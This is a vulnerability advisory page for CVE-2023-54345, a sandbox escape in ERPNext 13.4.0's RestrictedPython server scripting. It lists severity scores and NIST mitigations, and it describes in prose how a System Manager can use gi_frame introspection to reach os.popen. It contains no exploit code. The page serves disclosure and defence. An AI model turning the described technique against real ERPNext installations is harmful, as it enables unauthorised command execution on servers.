CVE-2023-54345
Published: 05 May 2026
Summary
CVE-2023-54345 is a high-severity Code Injection (CWE-94) vulnerability in Frappe Erpnext. Its CVSS base score is 8.8 (High).
Operationally, ranked at the 27.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-6 (Least Privilege) and SC-39 (Process Isolation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly remediates the sandbox escape flaw in RestrictedPython's safe_exec.py, preventing arbitrary code execution via frame introspection.
Enforces least privilege to restrict System Manager role access to the vulnerable /app/server-script endpoint, blocking authenticated exploitation.
Implements process isolation mechanisms in the RestrictedPython sandbox to prevent call stack traversal and os.popen invocation from user scripts.
NVD Description
Frappe Framework ERPNext 13.4.0 contains a sandbox escape vulnerability in RestrictedPython that allows authenticated users with System Manager role to execute arbitrary code by exploiting frame introspection. Attackers can create a server script via the /app/server-script endpoint and access the…
more
gi_frame attribute to traverse the call stack and invoke os.popen to execute system commands.
Deeper analysisAI
CVE-2023-54345 is a sandbox escape vulnerability in the RestrictedPython component used by Frappe Framework's ERPNext version 13.4.0. The flaw allows authenticated users with the System Manager role to bypass sandbox restrictions and execute arbitrary code through frame introspection in server scripts.
Attackers with System Manager privileges can exploit this by creating a server script via the /app/server-script endpoint. They access the gi_frame attribute to traverse the call stack and invoke functions such as os.popen, enabling execution of system commands. This results in high-impact confidentiality, integrity, and availability violations, as reflected in the CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and mapped to CWE-94 (Code Injection).
References point to the ERPNext site, Frappe Framework documentation on server scripting, a GitHub gist, the Frappe repository, and the vulnerable safe_exec.py source file at line 42 in v13.4.0, which handles the RestrictedPython execution environment.
Details
- CWE(s)